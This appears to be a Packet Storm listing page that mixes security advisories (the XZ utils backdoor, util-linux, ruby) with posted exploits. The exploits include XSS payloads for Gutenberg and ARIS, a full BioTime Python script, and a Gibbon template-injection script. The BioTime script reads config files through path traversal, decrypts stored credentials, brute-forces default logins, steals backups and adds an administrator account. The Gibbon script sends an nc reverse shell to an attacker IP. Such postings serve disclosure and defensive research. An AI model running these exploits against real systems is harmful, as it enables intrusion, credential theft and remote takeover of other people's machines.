WordPress Gutenberg plugin version 18.0.0 suffers from a persistent cross site scripting vulnerability.

Change Mirror Download

    ## Exploit Title: Wordpress Gutenberg Plugin Version 18.0.0 Stored XSS### Date: 2024-3-29### Exploit Author: tmrswrr### Category: Webapps### Vendor Homepage: https://wordpress.org/plugins/gutenberg/### Version 18.0.01 ) Go to Gutenberg Plugin edit page : https://127.0.0.1/WordPress/2024/03/29/welcome-to-the-gutenberg-editor/#comment-42 ) Write Leave a Reply  place your payload :<sVg/onLy=1 onLoaD=confirm(1)//3 ) After save will be see alert button

WordPress Gutenberg 18.0.0 Cross Site Scripting

Gentoo Linux Security Advisory 202403-4 - A backdoor has been discovered in XZ utils that could lead to remote compromise of systems. Versions less than 5.6.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202403-04  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: XZ utils: Backdoor in release tarballs  
     Date: March 29, 2024  
     Bugs: #928134  
       ID: 202403-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A backdoor has been discovered in XZ utils that could lead to remote  
compromise of systems.

Background  
==========

XZ Utils is free general-purpose data compression software with a high  
compression ratio.

Affected packages  
=================

Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
app-arch/xz-utils  >= 5.6.0      < 5.6.0

Description  
===========

A backdoor has been discovered in XZ utils. Please review the CVE  
identifier referenced below for details.

Impact  
======

Our current understanding of the backdoor is that is does not affect  
Gentoo systems, because

1. the backdoor only appears to be included on specific systems and  
Gentoo does not qualify;  
2. the backdoor as it is currently understood targets OpenSSH patched to  
work with systemd-notify support. Gentoo does not support or include  
these patches;

Analysis is still ongoing, however, and additional vectors may still be  
identified. For this reason we are still issuing this advisory as if  
that will be the case.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All XZ utils users should downgrade to the latest version before the  
backdoor was introduced:

  # emerge --sync  
  # emerge --ask --oneshot --verbose "<app-arch/xz-utils-5.6.0"

References  
==========

[ 1 ] CVE-2024-3094  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3094

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202403-04

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202403-04

ARIS: Business Process Management version 10.0.21.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Stored Cross-Site Scripting (XSS) in ARIS: BusinessProcess Management# Edition Version 10.0.21.0# Exploit Author: Seid Yassin# Date: 2024-03-28# Vendor: Software AG# Software Link: https://aris.com/# Version: ARIS: Business Process Management## Description:Discovered a file upload feature lacking proper file extension validation.This vulnerability allows attackers to upload any type of file, includingmalicious ones. To demonstrate this, we successfully uploaded an SVG fileto carry out a Cross-Site Scripting (XSS) attack. In XSS attacks, maliciousscripts are injected into web pages viewed by other users, potentiallyleading to data theft or unauthorized actions leading to potential theft ofcookies and session tokens.## Background:Cross-site scripting (XSS) is a common web security vulnerability thatcompromises user interactions with a vulnerable application. Stored XSSoccurs when user input is stored in the application and executed whenever auser triggers or visits the page.## Issue:A stored cross-site scripting (XSS) vulnerability in ARIS: Business ProcessManagement  software enables a malicious authenticated user to store a xsspayload(via SVG) using the web interface. Then, when viewed by a properlyauthenticated user or administrator, the JavaScript payload executes withinSVG and disguises all associated actions as performed by that unsuspectingauthenticated user/administrator.## Steps To Reproduce:1. Log into the ARIS application.2. Navigate to my tasks and select any of the task and upload documents(change request form)3. Insert any svg file with xss script in it . eg.https://gist.github.com/rudSarkar/76f1ce7a65c356a5cd71d058ab76a344## Expected Result:After a user uploads a new document in the Change Request Form, they canutilize the link for the SVG file and UUID to access another path at{{url}}/documents/api/documents/{{UUID}}/content## Actual Result:The ARIS application is vulnerable to Stored Cross-Site Scripting, asevidenced by the successful execution of the injected payload.## Proof of Concept:Attached Screenshots for the reference.

ARIS: Business Process Management 10.0.21.0 Cross Site Scripting

A use-after-free vulnerability exists in the Linux kernel netfilter: nf_tables component. This is a universal local privilege escalation proof of concept exploit working on Linux kernels between 5.14 and 6.6, including Debian, Ubuntu, and KernelCTF.

Linux nf_tables Local Privilege Escalation

Debian Linux Security Advisory 5650-1 - Skyler Ferrante discovered that the wall tool from util-linux does not properly handle escape sequences from command line arguments. A local attacker can take advantage of this flaw for information disclosure.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5650-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
March 31, 2024                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : util-linux  
CVE ID         : CVE-2024-28085  
Debian Bug     : 1067849

Skyler Ferrante discovered that the wall tool from util-linux does not  
properly handle escape sequences from command line arguments. A local  
attacker can take advantage of this flaw for information disclosure.

With this update wall and write are not anymore installed with setgid  
tty.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 2.36.1-8+deb11u2.

For the stable distribution (bookworm), this problem has been fixed in  
version 2.38.1-5+deb12u1.

We recommend that you upgrade your util-linux packages.

For the detailed security status of util-linux please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/util-linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmYJTYpfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Sm+A//cJhy/p0UGnSP5MYNc1a1sLeAMcNJm4lwxqR3zDYYqPWAe0jwsspaguNY  
1QPdaqa3d/Vm8pDO8WCnqxuzwqDjwyKNLUYmFbOyDx+U4EyVxC6wsUq936XMvx/5  
xiuTJripQm8urnvCaa7lGLhNSWHOc2jHWCqLnXC2AKwAtSGT7LWFKzC8csHxtRYO  
5A5iUaDONPWJtGpNDx1cczfIuEUvGpANQWOgxrcyAmHb1kjpGHm0RTikpkqKNm4W  
VH+DbgzuXlLtzUn0/YUXJPJkZtPe1LDshhUwFhU13K2lIUk3hWBWyGIrXgG+OZhu  
XgPc/5yAZHjmffHawUPE0LWGA3U6xOWV3pvBIi07XF/kFwR00PXGfMdv9WrTUxxV  
V6Fv5/kd2MsWvZQSYJ9Bn/6Wo5O9w8M3Lfso2OYx01OFRQHQfn4rfRek0ED81155  
qqPaemJYeUIJsDEmiwdr+eh0LZm7+3oMOgdfKDc9ARm9fasWxA7SFg4w5P1h0IWO  
lzuwEzm2W0az9YJ/BFMaZfoTTn/DW9FJHL7Fo5F2vO9CLAihxMYUDM3mUZNBexY8  
Z6XzhdWOSkOAiYI4khDK/TK8jQxSpEjNiFh7Z2pIZs4F6COjI94xtIn+N5nyJxnk  
AweXW0GGSZxt1sXD99JeD27Rv0UXNKyHfcQRPaYo9FyHntkVxi4=  
=jL1I  
-----END PGP SIGNATURE-----

Debian Security Advisory 5650-1

ghba is a PTR record scanner ported from ghba.c. It has been enhanced to run much faster than the original ghba.c. It can scan an entire private class C network in under a minute if 32 threads are available.

ghba PTR Record Scanner 

BioTime versions 8.5.5 and 9.0.1 suffer from directory traversal and file write vulnerabilities. This exploit also achieves remote code execution on version 8.5.5.

    #  __________.__     ___________.__                #  \______   \__| ___\__    ___/|__| _____   ____  #   |    |  _/  |/  _ \|    |   |  |/     \_/ __ \ #   |    |   \  (  <_> )    |   |  |  Y Y  \  ___/ #   |______  /__|\____/|____|   |__|__|_|  /\___  >#          \/                            \/     \/ # Tested on 8.5.5 (Build:20231103.R1905)# Tested on 9.0.1 (Build:20240108.18753)# BioTime, "time" for shellz!# https://claroty.com/team82/disclosure-dashboard/cve-2023-38952# https://claroty.com/team82/disclosure-dashboard/cve-2023-38951# https://claroty.com/team82/disclosure-dashboard/cve-2023-38950# RCE by adding a user to the system, not the app.# Relay machine creds over smb, while creating a backup# Decrypt SMTP, LDAP or SFTP creds, if any.# Get sql backup. Good luck cracking those hashes!# Can use Banner to determine which version is running# Server: Apache/2.4.29 (Win64) mod_wsgi/4.5.24 Python/2.7# Server: Apache/2.4.52 (Win64) mod_wsgi/4.7.1 Python/3.7# Server: Apache/2.4.48 (Win64) mod_wsgi/4.7.1 Python/3.7# Server: Apache => BioTime Version 9# @w3bd3vil - Krash Consulting (https://krashconsulting.com/fury-of-fingers-biotime-rce/)import requestsfrom bs4 import BeautifulSoupimport osimport jsonimport sysfrom Crypto.Cipher import AESfrom Crypto.Cipher import ARC4import base64from binascii import b2a_hex, a2b_hexrequests.packages.urllib3.disable_warnings()proxies = {    'http': 'http://127.0.0.1:8080',  # Proxy for HTTP traffic    'https': 'http://127.0.0.1:8080'  # Proxy for HTTPS traffic}proxies = {}target =  sys.argv[1]def decrypt_rc4(base64_encoded_rc4, password="biotime"):    encrypted_data = base64.b64decode(base64_encoded_rc4)    cipher = ARC4.new(password.encode())    decrypted_data = cipher.decrypt(encrypted_data)    return decrypted_data.decode()# base64_encoded_rc4 = "fj8xD5fAY6r6s3I="# password = "biotime"# decrypted_data = decrypt_rc4(base64_encoded_rc4, password)# print("Decrypted data:", decrypted_data)AES_PASSWORD = b'china@2018encryption#aes'AES_IV = b'zkteco@china2019'def filling_data(data, restore=False):    '''    :param data: str    :return: str    '''    if restore:        return data[0:-ord(data[-1])]    block_size = AES.block_size  # Use AES.block_size instead of None.block_size    return data + (block_size - len(data) % block_size) * chr(block_size - len(data) % block_size)def aes_encrypt(content):    '''    Encryption    :param content: str, The length of content must be times of AES.block_size, using filling_data to fill out    :return: str    '''    if isinstance(content, bytes):        content = str(content, 'utf-8')    cipher = AES.new(AES_PASSWORD, AES.MODE_CBC, AES_IV)    encrypted = cipher.encrypt(filling_data(content).encode('utf-8'))    result = b2a_hex(encrypted).decode('utf-8')    return resultdef aes_decrypt(content):    '''    Decryption    :param content: str or bytes, Encryption string    :return: str    '''    if isinstance(content, str):        content = content.encode('utf-8')    cipher = AES.new(AES_PASSWORD, AES.MODE_CBC, AES_IV)    result = cipher.decrypt(a2b_hex(content)).decode('utf-8')    return filling_data(result, restore=True)#Check BioTimeurl = f'{target}/license/'response = requests.get(url, proxies=proxies, verify=False)html_content = response.contentsoup = BeautifulSoup(html_content, 'html.parser')build_lines = [line.strip() for line in soup.get_text().split('\n') if 'build' in line.lower()]build = Nonefor line in build_lines:    build = line    print(f"Found BioTime: {line}")    breakif build != None:    buildNumber = build[0]else:    print("Unsupported Target!")    sys.exit(1)# Dir Traversalurl = f'{target}/iclock/file?SN=win&url=/../../../../../../../../windows/win.ini'response = requests.get(url, proxies=proxies, verify=False)try:    print("Dir Traversal Attempt\nOutput of windows/win.ini file:")    print(base64.b64decode(response.text).decode('utf-8'))    try:        url = f'{target}/iclock/file?SN=att&url=/../../../../../../../../biotime/attsite.ini'        response = requests.get(url, proxies=proxies, verify=False)        attConfig = base64.b64decode(response.text).decode('utf-8')        #print(f"Output of BioTime config file: {attConfig}")    except:        try:            url = f'{target}/iclock/file?SN=att&url=/../../../../../../../../zkbiotime/attsite.ini'            response = requests.get(url, proxies=proxies, verify=False)            attConfig = base64.b64decode(response.text).decode('utf-8')            #print(f"Output of BioTime config file: {attConfig}")        except:            print("Couldn't get BioTime config file (possibly non default configuration)")    lines = attConfig.split('\n')    for i, line in enumerate(lines):        if "PASSWORD=@!@=" in line:            dec_att = decrypt_rc4(lines[i].split("@!@=")[1])            lines[i] = lines[i].split("@!@=")[0]+dec_att    attConfig_modified = '\n'.join(lines)    print(f"Output of BioTime Decrypted config file:\n{attConfig_modified}")except:    print("Couldn't exploit Dir Traversal")# Extract Cookiesurl = f'{target}/login/'response = requests.get(url, proxies=proxies, verify=False)if response.status_code == 200:    soup = BeautifulSoup(response.text, 'html.parser')    csrf_token_header = soup.find('input', {'name': 'csrfmiddlewaretoken'})    if csrf_token_header:        csrf_token_header_value = csrf_token_header['value']        print(f"CSRF Token Header: {csrf_token_header_value}")        session_id_cookie = response.cookies.get('sessionid')    if session_id_cookie:        print(f"Session ID: {session_id_cookie}")        csrf_token_value = response.cookies.get('csrftoken')    if csrf_token_value:        print(f"CSRF Token Cookie: {csrf_token_value}")else:    print(f"Failed to retrieve data from {url}. Status code: {response.status_code}")# Login Now!cookies = {    'sessionid': session_id_cookie,    'csrftoken': csrf_token_value}for i in range(1,10):    username = i    password = '123456' # Deafult password!    data = {        'username': username,        'password': password,        'captcha':'',        'login_user':'employee'    }    headers = {        'User-Agent': 'Krash Consulting',        'X-CSRFToken': csrf_token_header_value    }    response = requests.post(url, data=data, cookies=cookies, headers=headers, proxies=proxies, verify=False)    if response.status_code == 200:        json_response = response.json()        ret_value = json_response.get('ret')        if ret_value == 0:            print(f"Valid Credentials found: Username is {username} and password is {password}")            session_id_cookie = response.cookies.get('sessionid')            if session_id_cookie:                print(f"Auth Session ID: {session_id_cookie}")                        csrf_token_value = response.cookies.get('csrftoken')            if csrf_token_value:                print(f"Auth CSRF Token Cookie: {csrf_token_value}")            breakif i == 9:    print("No valid users found!")    sys.exit(1)# Check for Backupsdef downloadBackup():    url = f'{target}/base/dbbackuplog/table/?page=1&limit=33'    cookies = {        'sessionid': session_id_cookie,        'csrftoken': csrf_token_value    }    response = requests.get(url, cookies=cookies, proxies=proxies, verify=False)    response_data = response.json()    print("Backup files list")    print(json.dumps(response_data, indent=4))    if response_data['count'] > 0:        backup_info = response_data['data'][0]  # Latest Backup        operator_name = backup_info['operator']        backup_file = backup_info['backup_file']        db_type = backup_info['db_type']        print("Operator:", operator_name)        print("Backup File:", backup_file)        print("Database Type:", db_type)        if buildNumber == "9":            createBackup()            print("Backup File password: Krash")        #download = os.path.basename(backup_file)        path = os.path.normpath(backup_file)        try:            split_path = path.split(os.sep)            files_index = split_path.index('files')            relative_path = '/'.join(split_path[files_index + 1:])        except:            return False        url = f'{target}/files/{relative_path}'        print(url)        response = requests.get(url, proxies=proxies, verify=False)        if response.status_code == 200:            filename = os.path.basename(url)            with open(filename, 'wb') as file:                file.write(response.content)            print(f"File '{filename}' downloaded successfully.")        else:            print("Failed to download the file. Status code:", response.status_code)        return False    else:        print("No backup Found!")        return Truedef createBackup(targetPath=None):    print("Attempting to create backup.")    url = f'{target}/base/dbbackuplog/action/?action_name=44424261636b75704d616e75616c6c79&_popup=true&id='    cookies = {        'sessionid': session_id_cookie,        'csrftoken': csrf_token_value    }    response = requests.get(url, cookies=cookies, proxies=proxies, verify=False)    html_content = response.content    soup = BeautifulSoup(html_content, 'html.parser')    pathBackup = [line.strip() for line in soup.get_text().split('\n') if 'name="file_path"' in line.lower()]    print(f"Possible backup location: {pathBackup}")    url = f'{target}/base/dbbackuplog/action/'    if targetPath == None:        if buildNumber == "9" or build[:5] == "8.5.5":            targetPath = "C:\\ZKBioTime\\files\\backup\\"        else:            targetPath = "C:\\BioTime\\files\\fw\\"    if buildNumber == "9":        data = {            'csrfmiddlewaretoken': csrf_token_value,            'file_path':targetPath,            'action_name': '44424261636b75704d616e75616c6c79',            'backup_encryption_choices': '2',            'auto_backup_password': 'Krash'        }    else:        data = {            'csrfmiddlewaretoken': csrf_token_value,            'file_path':targetPath,            'action_name': '44424261636b75704d616e75616c6c79'        }    response = requests.post(url,  cookies=cookies, data=data, proxies=proxies, verify=False)    if response.status_code == 200:        print("Backup Initiated.")    else:        print("Backup failed!")if downloadBackup():    createBackup()    downloadBackup()url = f'{target}/base/api/systemSettings/email_setting/'cookies = {    'sessionid': session_id_cookie,    'csrftoken': csrf_token_value}response = requests.get(url, cookies=cookies, proxies=proxies, verify=False)if response.status_code == 200:    response_data = response.json()    print("SMTP Settings")    for key in response_data:        if 'password' in key.lower():            value = response_data[key]            #print(f'{key} decrypted value {aes_decrypt(value)}')            response_data[key] = aes_decrypt(value)    print(json.dumps(response_data, indent=4))url = f'{target}/base/api/systemSettings/ldap_setup/'cookies = {    'sessionid': session_id_cookie,    'csrftoken': csrf_token_value}response = requests.get(url, cookies=cookies, proxies=proxies, verify=False)if response.status_code == 200:    response_data = response.json()    print("LDAP Settings")    for key in response_data:        if 'password' in key.lower():            value = response_data[key]            #print(f'{key} decrypted value {aes_decrypt(value)}')            response_data[key] = aes_decrypt(value)    print(json.dumps(response_data, indent=4))def sftpRCE():    print("Attempting RCE!")    #Add SFTP, Need valid IP/credentials here!    print("Adding FTP List")    url = f'{target}/base/sftpsetting/add/'    myIpaddr = '192.168.0.11'    myUser = 'test'    myPassword = 'test@123'    cookies = {        'sessionid': session_id_cookie,        'csrftoken': csrf_token_value    }    data = {        'csrfmiddlewaretoken': csrf_token_value,        'host':myIpaddr,        'port':22,        'is_sftp': 1,        'user_name':myUser,        'user_password':myPassword,        'user_key':'',        'action_name': '47656e6572616c416374696f6e4e6577'    }    response = requests.post(url,  cookies=cookies, data=data, proxies=proxies, verify=False)    print(response)    url = f'{target}/base/sftpsetting/table/?page=1&limit=33'    cookies = {        'sessionid': session_id_cookie,        'csrftoken': csrf_token_value    }    response = requests.get(url, cookies=cookies, proxies=proxies, verify=False)    response_data = response.json()    print("FTP List")    print(json.dumps(response_data, indent=4))    backup_info = response_data['data'][0]  # Latest SFTP    getID = backup_info['id']    if getID:        print("ID to edit ", getID)    #Edit SFTP (Response can have errors, it doesn't matter)    print("Editing SFTP Settings")    if buildNumber == "9":        dirTraverse = '\..\..\..\python311\lib\io.py'    else:        dirTraverse = '\..\..\..\python37\lib\io.py'    if len(dirTraverse) > 30:        print("Directory Traversal length is greater than 30, will not work!")        sys.exit(1)    url = f'{target}/base/sftpsetting/edit/'    cookies = {        'sessionid': session_id_cookie,        'csrftoken': csrf_token_value    }    data = {        'csrfmiddlewaretoken': csrf_token_value,        'host':myIpaddr,        'port':22,        'is_sftp': 1,        'user_name': dirTraverse,        'user_password':myPassword,        'user_key':'import os\nos.system("net user /add omair190 KCP@ssw0rd && net localgroup administrators ...',        'obj_id': getID    }    response = requests.post(url,  cookies=cookies, data=data, proxies=proxies, verify=False)    print("A new user should be added now on the server \nusername: omair190\npassword: KCP@ssw0rd")    #Delete SFTP    print("Deleting SFTP Settings")    url = f'{target}/base/sftpsetting/action/'    cookies = {        'sessionid': session_id_cookie,        'csrftoken': csrf_token_value    }    data = {        'csrfmiddlewaretoken': csrf_token_value,        'id': getID,        'action_name': '47656e6572616c416374696f6e44656c657465'    }    response = requests.post(url,  cookies=cookies, data=data, proxies=proxies, verify=False)#RCEif buildNumber == "9" or build[:5] == "8.5.5":    sftpRCE()# #Relay Creds# createBackup("\\\\192.168.0.11\\KC\\test")

BioTime Directory Traversal / Remote Code Execution

Red Hat Security Advisory 2024-1576-03 - An update for the ruby:3.1 module is now available for Red Hat Enterprise Linux 9. Issues addressed include HTTP response splitting and denial of service vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1576.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: ruby:3.1 security, bug fix, and enhancement updateAdvisory ID:        RHSA-2024:1576-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1576Issue date:         2024-04-01Revision:           03CVE Names:          CVE-2021-33621====================================================================Summary: An update for the ruby:3.1 module is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.The following packages have been upgraded to a later upstream version: ruby (3.1). (RHEL-29052)Security Fix(es):* ruby/cgi-gem: HTTP response splitting in CGI (CVE-2021-33621)* ruby: ReDoS vulnerability in URI (CVE-2023-28755)* ruby: ReDoS vulnerability - upstream's incomplete fix for CVE-2023-28755 (CVE-2023-36617)* ruby: ReDoS vulnerability in Time (CVE-2023-28756)Bug Fix(es):* ruby/rubygem-irb: IRB has hard dependency on rubygem-rdoc (RHEL-29048)* ruby: Ruby cannot read private key in FIPS mode on RHEL 9 (RHEL-12437)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2021-33621References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2149706https://bugzilla.redhat.com/show_bug.cgi?id=2184059https://bugzilla.redhat.com/show_bug.cgi?id=2184061https://bugzilla.redhat.com/show_bug.cgi?id=2218614

Red Hat Security Advisory 2024-1576-03

Gibbon version 26.0.00 suffers from a server-side template injection vulnerability that allows for remote code execution.

    # Exploit Title: Gibbon LMS has an SSTI vulnerability on the v26.0.00 version# Date: 21.01.2024# Exploit Author: SecondX.io Research Team(Islam Rzayev,Fikrat Guliev, Ali Maharramli)# Vendor Homepage: https://gibbonedu.org/# Software Link: https://github.com/GibbonEdu/core# Version: v26.0.00# Tested on: Ubuntu 22.0# CVE : CVE-2024-24724import requestsimport reimport sysdef login(target_host, target_port,email,password):    url = f'http://{target_host}:{target_port}/login.php?timeout=true'    headers = {"Content-Type": "multipart/form-data; boundary=---------------------------174475955731268836341556039466"}    data = f"-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibbonSchoolYearID\"\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibboni18nID\"\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n"    r = requests.post(url, headers=headers, data=data, allow_redirects=False)    Session_Cookie = re.split(r"\s+", r.headers['Set-Cookie'])    if Session_Cookie[4] is not None and '/index.php' in str(r.headers['Location']):        print("login successful!")    return Session_Cookie[4]def rce(cookie, target_host, target_port, attacker_ip, attacker_port):    url = f'http://{target_host}:{target_port}/modules/School%20Admin/messengerSettingsProcess.php'    headers = {"Content-Type": "multipart/form-data; boundary=---------------------------67142646631840027692410521651", "Cookie": cookie}    data = f"-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n/modules/School Admin/messengerSettings.php\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"enableHomeScreenWidget\"\r\n\r\nY\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"signatureTemplate\"\r\n\r\n{{{{[\'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {attacker_ip} {attacker_port} >/tmp/f']|filter('system')}}}}\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"messageBcc\"\r\n\r\n\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"pinnedMessagesOnHome\"\r\n\r\nN\r\n-----------------------------67142646631840027692410521651--\r\n"    r = requests.post(url, headers=headers, data=data, allow_redirects=False)    if 'success0' in str(r.headers['Location']):        print("Payload uploaded successfully!")def trigger(cookie, target_host, target_port):    url = f'http://{target_host}:{target_port}/index.php?q=/modules/School%20Admin/messengerSettings.php&return=success0'    headers = {"Cookie": cookie}    print("RCE successful!")    r = requests.get(url, headers=headers, allow_redirects=False)if __name__ == '__main__':    if len(sys.argv) != 7:        print("Usage: script.py <target_host> <target_port> <attacker_ip> <attacker_port> <email> <password>")        sys.exit(1)    cookie = login(sys.argv[1], sys.argv[2],sys.argv[5],sys.argv[6])    rce(cookie, sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])    trigger(cookie, sys.argv[1], sys.argv[2])

Gibbon 26.0.00 Server-Side Template Injection / Remote Code Execution

It has been discovered that the upstream source tarballs for xz-utils, the XZ-format compression utilities, are compromised and inject malicious code, at build time, into the resulting liblzma5 library. Included in this archive are not only the advisory but additional data and a testing script to see if you're affected.

Source

Packet Storm